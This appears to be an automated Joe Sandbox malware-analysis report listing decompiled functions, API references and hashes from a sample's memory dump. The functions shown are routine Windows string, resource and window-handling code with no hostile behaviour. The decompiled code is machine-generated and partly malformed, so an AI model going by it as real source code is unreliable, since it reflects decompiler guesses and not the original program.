      0x009ad02b
      0x009ad031
      0x009ad035
      0x009ad065
      0x009ad068
      0x009ad085
      0x009ad085
      0x009ad087
      0x009ad089
      0x00000000
      0x00000000
      0x009ad073
      0x009ad078
      0x009ad07a
      0x009ad07f
      0x00000000
      0x009ad07f
      0x00000000
      0x009ad07a
      0x009ad037
      0x009ad03c
      0x009ad04e
      0x009ad052
      0x009ad053
      0x00000000
      0x009ad055
      0x009ad05c
      0x009ad061
      0x009ad063
      0x00000000
      0x00000000
      0x009ad03e
      0x009ad045
      0x009ad04c
      0x00000000
      0x00000000
      0x009ad04c
      0x009ad03c
      0x009ad08e
      0x009ad08e

      APIs
      • GetDlgItem.USER32 ref: 009AD025
      • GetTopWindow.USER32(00000000), ref: 009AD038
        • Part of subcall function 009AD018: GetWindow.USER32(00000000,00000002), ref: 009AD07F
      • GetTopWindow.USER32(?), ref: 009AD068
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Window$Item
      • String ID:
      • API String ID: 369458955-0
      • Opcode ID: a4a41dad175f287e833e1a78b82114f30b44ebf40e052cbe2e4d55a6deaf6ae9
      • Instruction ID: ff5f58b5126adc2ac4f07fe0b64a15487de929ff8312ce9972dc6b89656fe0f8
      • Opcode Fuzzy Hash: a4a41dad175f287e833e1a78b82114f30b44ebf40e052cbe2e4d55a6deaf6ae9
      • Instruction Fuzzy Hash: 26014B36003639B7CF322FA18C08E9F3B19AF833A0F014125FD0295510E735CA1396E5
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009D3912 Relevance: 6.0, APIs: 4, Instructions: 49memoryCOMMON
      Download Yara Rule
      C-Code - Quality: 34%
      			E009D3912(void* __ecx, short* _a4) {
				int _v8;
				int _v12;
				void* __ebp;
				int _t9;
				char* _t10;
				char* _t12;
				void* _t14;
				char* _t15;
				void* _t18;

				_t17 = __ecx;
				_push(__ecx);
				_push(__ecx);
				if(_a4 != 0) {
					__imp__#7(_a4, _t18, _t14);
					_v12 = _t9;
					_t10 = WideCharToMultiByte(0, 0, _a4, _t9, 0, 0, 0, 0);
					_v8 = _t10;
					__imp__#150(0, _t10);
					_t15 = _t10;
					if(_t15 == 0) {
						E009B874A(_t17);
					}
					WideCharToMultiByte(0, 0, _a4, _v12, _t15, _v8, 0, 0);
					_t12 = _t15;
				} else {
					_t12 = 0;
				}
				return _t12;
			}












      0x009d3912
      0x009d3917
      0x009d3918
      0x009d391f
      0x009d392a
      0x009d393e
      0x009d3943
      0x009d3947
      0x009d394a
      0x009d3950
      0x009d3954
      0x009d3956
      0x009d3956
      0x009d3969
      0x009d396c
      0x009d3921
      0x009d3921
      0x009d3921
      0x009d3971

      APIs
      • SysStringLen.OLEAUT32(00000000), ref: 009D392A
      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000C,0000000C,?,00A0F358,00000000,00000018,00A0F6B4), ref: 009D3943
      • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 009D394A
      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,0000000C,0000000C,?,00A0F358,00000000,00000018,00A0F6B4), ref: 009D3969
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Byte$CharMultiStringWide$Alloc
      • String ID:
      • API String ID: 3384502665-0
      • Opcode ID: 234ddc2ee248f93f6408bd503c8c01677755e343819a84cb846da1fa7afa8c24
      • Instruction ID: c67c81d5df751a6671c9f46724559cbc5fe208979302081b699f46d80f319833
      • Opcode Fuzzy Hash: 234ddc2ee248f93f6408bd503c8c01677755e343819a84cb846da1fa7afa8c24
      • Instruction Fuzzy Hash: D2F044B6502128BF9B215BA6CD4CCEFBF6CEF863F57108026F90592110D6714E41DAF0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B1FB0 Relevance: 6.0, APIs: 4, Instructions: 49memoryCOMMON
      Download Yara Rule
      C-Code - Quality: 37%
      			E009B1FB0(void* __ecx, char* _a4, int _a8) {
				short* _v8;
				short* _t12;
				short* _t13;
				int _t21;

				if(_a4 == 0 || _a8 == 0) {
					L7:
					_t12 = 0;
				} else {
					_t13 = MultiByteToWideChar(3, 0, _a4, _a8, 0, 0);
					_t21 = _t13;
					if(_a8 == 0xffffffff) {
						_t6 = _t21 - 1; // -1
						_t13 = _t6;
					}
					__imp__#4(0, _t13);
					_v8 = _t13;
					if(_t13 == 0 || MultiByteToWideChar(3, 0, _a4, _a8, _t13, _t21) == _t21) {
						_t12 = _v8;
					} else {
						__imp__#6(_v8);
						goto L7;
					}
				}
				return _t12;
			}







      0x009b1fbe
      0x009b200c
      0x009b200c
      0x009b1fc5
      0x009b1fd6
      0x009b1fdc
      0x009b1fde
      0x009b1fe0
      0x009b1fe0
      0x009b1fe0
      0x009b1fe5
      0x009b1feb
      0x009b1ff0
      0x009b2013
      0x009b2003
      0x009b2006
      0x00000000
      0x009b2006
      0x009b1ff0
      0x009b2012

      APIs
      • MultiByteToWideChar.KERNEL32(00000003,00000000,?,?,00000000,00000000), ref: 009B1FD6
      • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 009B1FE5
      • MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000), ref: 009B1FFD
      • SysFreeString.OLEAUT32(?), ref: 009B2006
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: ByteCharMultiStringWide$AllocFree
      • String ID:
      • API String ID: 447844807-0
      • Opcode ID: d5dc8fe60fb6a784f148259a0129628bd88599fb9c32c708814932e82f586c6f
      • Instruction ID: 477dd77051ba499d3c3c9501a78b719d67c3bf3c1b16e6796cccfe22dbb3e339
      • Opcode Fuzzy Hash: d5dc8fe60fb6a784f148259a0129628bd88599fb9c32c708814932e82f586c6f
      • Instruction Fuzzy Hash: F5014B7250010DFFEB219FE0DE84DEABBADEB487A1B148126F61596050D2319E41DB60
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B0230 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
      Download Yara Rule
      C-Code - Quality: 85%
      			E009B0230(intOrPtr __ecx, void* __edx, void* __fp0, CHAR* _a4) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t7;
				struct HRSRC__* _t10;
				void* _t13;
				void* _t17;
				void* _t19;
				struct HINSTANCE__* _t21;
				void* _t22;
				void* _t29;

				_t29 = __fp0;
				_t17 = __edx;
				_push(__ecx);
				_push(_t21);
				_t13 = 0;
				_t19 = 0;
				_v8 = __ecx;
				_t24 = _a4;
				if(_a4 == 0) {
					L4:
					_push(_t19);
					_t22 = L009AFD35(_t13, _v8, _t17, _t19, _t21, _t26, _t29);
					if(_t19 != 0 && _t13 != 0) {
						FreeResource(_t13);
					}
					_t7 = _t22;
				} else {
					_t21 =  *(E009BD77F(0, 0, _t21, _t24) + 0xc);
					_t10 = FindResourceA(_t21, _a4, 0xf0);
					if(_t10 == 0) {
						goto L4;
					} else {
						_t7 = LoadResource(_t21, _t10);
						_t13 = _t7;
						_t26 = _t13;
						if(_t13 != 0) {
							_t19 = LockResource(_t13);
							goto L4;
						}
					}
				}
				return _t7;
			}
















      0x009b0230
      0x009b0230
      0x009b0235
      0x009b0237
      0x009b0239
      0x009b023b
      0x009b023d
      0x009b0240
      0x009b0243
      0x009b0277
      0x009b027a
      0x009b0280
      0x009b0284
      0x009b028b
      0x009b028b
      0x009b0291
      0x009b0245
      0x009b024a
      0x009b0256
      0x009b025e
      0x00000000
      0x009b0260
      0x009b0262
      0x009b0268
      0x009b026a
      0x009b026c
      0x009b0275
      0x00000000
      0x009b0275
      0x009b026c
      0x009b025e
      0x009b0297

      APIs
      • FindResourceA.KERNEL32(?,?,000000F0), ref: 009B0256
      • LoadResource.KERNEL32(?,00000000), ref: 009B0262
      • LockResource.KERNEL32(00000000), ref: 009B026F
      • FreeResource.KERNEL32(00000000,00000000), ref: 009B028B
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Resource$FindFreeLoadLock
      • String ID:
      • API String ID: 1078018258-0
      • Opcode ID: 4601db2976df4ab1c72e52d0bf213a1e3a831b98a8d176d039e00c01e0f3c9d9
      • Instruction ID: afe78e73138ffde233ebd7f408170efaa99eae63e02aba41a8b07de5a5f89451
      • Opcode Fuzzy Hash: 4601db2976df4ab1c72e52d0bf213a1e3a831b98a8d176d039e00c01e0f3c9d9
      • Instruction Fuzzy Hash: 4DF0C876601301AB87119FE59ECCAAF77ACDFC57707054039FA1693211DF70DD058660
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B0E11 Relevance: 6.0, APIs: 4, Instructions: 39windowCOMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E009B0E11(void* __ebx, void* __ecx, void* __edx) {
				void* _t24;
				void* _t28;

				_t24 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t28 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x6c)) != 0) {
					goto ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x6c)))) + 0xb0)));
				}
				if(E009AC90B(__ebx, _t22, _t24, GetParent( *(__ecx + 0x20))) != 0) {
					_t22 = E009AC90B(__ebx, _t22, _t24, GetParent( *(_t28 + 0x20)));
					if(E009AB40F(_t16) != 0) {
						_t22 = E009AC90B(__ebx, _t22, _t24, GetParent( *(_t28 + 0x20)));
						 *(E009AB40F(_t19) + 0x70) =  *(_t20 + 0x70) & 0x00000000;
					}
				}
				return E009AC90B(_t21, _t22, _t24, SetFocus( *(_t28 + 0x20)));
			}





      0x009b0e11
      0x009b0e11
      0x009b0e11
      0x009b0e14
      0x009b0e1a
      0x009b0e76
      0x009b0e76
      0x009b0e30
      0x009b0e3d
      0x009b0e46
      0x009b0e53
      0x009b0e5a
      0x009b0e5a
      0x009b0e46
      0x009b0e6f

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Parent$Focus
      • String ID:
      • API String ID: 384096180-0
      • Opcode ID: 64a24889ca6f7b49e26506bd34a3df00c204170628028fbbe5635005aa6bc49a
      • Instruction ID: 631d144af2eb138a63d592f0afebb492ea4f125865932a08df7a80723456eac6
      • Opcode Fuzzy Hash: 64a24889ca6f7b49e26506bd34a3df00c204170628028fbbe5635005aa6bc49a
      • Instruction Fuzzy Hash: 2DF0FFB25107089BCB207B72DD08B5B77EABFC5320F050C69E58687565DB35E842CE50
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B1147 Relevance: 6.0, APIs: 4, Instructions: 38stringCOMMON
      Download Yara Rule
      C-Code - Quality: 80%
      			E009B1147(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				int _t24;
				int _t26;
				void* _t40;

				_push(4);
				E00AAD232(0xac8b12, __ebx, __edi, __esi);
				if( *((intOrPtr*)(__ecx + 0x6c)) != 0) {
					E009A5D70(_t40 - 0x10, __edx, E009B9D52());
					 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
					_push(_t40 - 0x10);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x6c)))) + 0x8c))();
					E009A6677( *((intOrPtr*)(__ecx + 0x6c)), E00AAF0A3( *(_t40 + 8),  *(_t40 + 0xc),  *((intOrPtr*)(_t40 - 0x10)), 0xffffffff));
					_t24 = lstrlenA( *(_t40 + 8));
					E009A5510( *((intOrPtr*)(_t40 - 0x10)) + 0xfffffff0, _t40 - 0x10);
					_t26 = _t24;
				} else {
					_t26 = GetWindowTextA( *(__ecx + 0x20),  *(_t40 + 8),  *(_t40 + 0xc));
				}
				return E00AAD30A(_t26);
			}






      0x009b1147
      0x009b114e
      0x009b1159
      0x009b1175
      0x009b117f
      0x009b1186
      0x009b1187
      0x009b119e
      0x009b11a9
      0x009b11b7
      0x009b11bc
      0x009b115b
      0x009b1164
      0x009b1164
      0x009b11c3

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: H_prolog3TextWindow__cftoflstrlen
      • String ID:
      • API String ID: 3010948398-0
      • Opcode ID: b091ab0dfb9d12955d16e46991aec83c4bd3aadb0aa9e089845adab670f64fed
      • Instruction ID: 956e5bf1219d11ef146ab7c5ae3163197738c0df39855fb25ca529e6144b07b1
      • Opcode Fuzzy Hash: b091ab0dfb9d12955d16e46991aec83c4bd3aadb0aa9e089845adab670f64fed
      • Instruction Fuzzy Hash: 3C014B76500514AFCF05AFA4CD09BAE7BB5BF45320F408A28F6625B2E2DB329910DB90
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B4FF7 Relevance: 6.0, APIs: 4, Instructions: 38COMMON
      Download Yara Rule
      C-Code - Quality: 73%
      			E009B4FF7(intOrPtr __ecx, void* __edx, void* __eflags, CHAR* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t9;
				void* _t14;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t22;
				struct HINSTANCE__* _t23;

				_t18 = __edx;
				_push(__ecx);
				_push(_t22);
				_push(_t19);
				_v8 = __ecx;
				_t14 = 0;
				_t23 =  *(E009BD77F(0, _t19, _t22, __eflags) + 0xc);
				_t20 = LoadResource(_t23, FindResourceA(_t23, _a4, 5));
				_t27 = _t20;
				if(_t20 != 0) {
					_t14 = LockResource(_t20);
				}
				_t9 = E009B4C39(_t14, _v8, _t18, _t20, _t23, _t27, _t14, _a8, _t23);
				FreeResource(_t20);
				return _t9;
			}















      0x009b4ff7
      0x009b4ffc
      0x009b4ffe
      0x009b4fff
      0x009b5000
      0x009b5003
      0x009b500a
      0x009b5021
      0x009b5023
      0x009b5025
      0x009b502e
      0x009b502e
      0x009b5038
      0x009b5040
      0x009b504c

      APIs
      • FindResourceA.KERNEL32(?,?,00000005), ref: 009B5013
      • LoadResource.KERNEL32(?,00000000), ref: 009B501B
      • LockResource.KERNEL32(00000000), ref: 009B5028
      • FreeResource.KERNEL32(00000000,00000000,?,?), ref: 009B5040
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Resource$FindFreeLoadLock
      • String ID:
      • API String ID: 1078018258-0
      • Opcode ID: bef530d22d6d61106ba11b4609661242e4b681a0bc052c100ba31f246ac3544a
      • Instruction ID: f7f3e2437b6461303d0c4d087129cc1a2303ea326f7b4369e4de841662ef185d
      • Opcode Fuzzy Hash: bef530d22d6d61106ba11b4609661242e4b681a0bc052c100ba31f246ac3544a
      • Instruction Fuzzy Hash: 00F0B476102214BBC701ABE59D49DDFBBADDF997B17014016F50693212DA74DD018BA0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B4F63 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E009B4F63(void* __edx) {
				intOrPtr _t16;
				struct HWND__* _t19;
				intOrPtr _t23;
				void* _t27;
				intOrPtr* _t29;
				void* _t30;

				_t27 = __edx;
				_t29 =  *((intOrPtr*)(_t30 - 0x20));
				_t23 =  *((intOrPtr*)(_t30 - 0x24));
				if( *((intOrPtr*)(_t30 - 0x28)) != 0) {
					E009B0C13(_t23, 1);
				}
				if( *((intOrPtr*)(_t30 - 0x2c)) != 0) {
					EnableWindow( *(_t30 - 0x14), 1);
				}
				if( *(_t30 - 0x14) != 0) {
					_t19 = GetActiveWindow();
					_t35 = _t19 -  *((intOrPtr*)(_t29 + 0x20));
					if(_t19 ==  *((intOrPtr*)(_t29 + 0x20))) {
						SetActiveWindow( *(_t30 - 0x14));
					}
				}
				 *((intOrPtr*)( *_t29 + 0x60))();
				E009B4984(_t23, _t29, _t27, 0, _t29, _t35);
				if( *((intOrPtr*)(_t29 + 0x78)) != 0) {
					FreeResource( *(_t30 - 0x18));
				}
				_t16 =  *((intOrPtr*)(_t29 + 0x60));
				return E00AAD30A(_t16);
			}









      0x009b4f63
      0x009b4f63
      0x009b4f66
      0x009b4f6e
      0x009b4f74
      0x009b4f74
      0x009b4f7c
      0x009b4f83
      0x009b4f83
      0x009b4f8c
      0x009b4f8e
      0x009b4f94
      0x009b4f97
      0x009b4f9c
      0x009b4f9c
      0x009b4f97
      0x009b4fa6
      0x009b4fab
      0x009b4fb3
      0x009b4fb8
      0x009b4fb8
      0x009b4fbe
      0x009b4fc6

      APIs
      • EnableWindow.USER32(?,00000001), ref: 009B4F83
      • GetActiveWindow.USER32 ref: 009B4F8E
      • SetActiveWindow.USER32(?,?,00000024,009A4695,3A0E8B0C), ref: 009B4F9C
      • FreeResource.KERNEL32(?,?,00000024,009A4695,3A0E8B0C), ref: 009B4FB8
        • Part of subcall function 009B0C13: EnableWindow.USER32(?,009A4695), ref: 009B0C24
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Window$ActiveEnable$FreeResource
      • String ID:
      • API String ID: 253586258-0
      • Opcode ID: 6aed3026ac0070cace6e0e261fe945012673458a89e40404fd2c6d6cdfe1aef0
      • Instruction ID: 55a422ce984aaa33ab503244e94eaad1af71bfd37bda07ab604a9f56481de1ce
      • Opcode Fuzzy Hash: 6aed3026ac0070cace6e0e261fe945012673458a89e40404fd2c6d6cdfe1aef0
      • Instruction Fuzzy Hash: 79F04F34A00608CBCF21EBA4CA455EDBBB6FF88711B600129E142772A2CB315D81DF62
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B3218 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E009B3218(void* __ecx, intOrPtr _a4) {
				intOrPtr _t10;
				void* _t12;

				_t12 = __ecx;
				E00AAB4AB( *((intOrPtr*)(__ecx + 0x58)));
				 *((intOrPtr*)(_t12 + 0x58)) = E00AAF4C4(_a4);
				E00AAB4AB( *((intOrPtr*)(_t12 + 0x6c)));
				_t10 = E00AAF4C4( *((intOrPtr*)(_t12 + 0x50)));
				 *((intOrPtr*)(_t12 + 0x6c)) = _t10;
				return _t10;
			}





      0x009b321e
      0x009b3223
      0x009b3233
      0x009b3236
      0x009b323e
      0x009b3246
      0x009b324b

      APIs
      • _free.LIBCMT ref: 009B3223
        • Part of subcall function 00AAB4AB: HeapFree.KERNEL32(00000000,00000000,?,00AAAEFC,?), ref: 00AAB4C1
        • Part of subcall function 00AAB4AB: GetLastError.KERNEL32(?,?,00AAAEFC,?), ref: 00AAB4D3
      • __strdup.LIBCMT ref: 009B322B
      • _free.LIBCMT ref: 009B3236
      • __strdup.LIBCMT ref: 009B323E
        • Part of subcall function 00AAF4C4: _strlen.LIBCMT ref: 00AAF4DA
        • Part of subcall function 00AAF4C4: _malloc.LIBCMT ref: 00AAF4E3
        • Part of subcall function 00AAF4C4: _strcpy_s.LIBCMT ref: 00AAF4F5
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: __strdup_free$ErrorFreeHeapLast_malloc_strcpy_s_strlen
      • String ID:
      • API String ID: 2371051941-0
      • Opcode ID: 4d2df8bda681c98edc494ca8d381bc119e034c044b4dac1a79fb45ddd33e505c
      • Instruction ID: 432a2250cd60a3009b7219e26843b8a9052c86822addb055b7a1fdd2f757c412
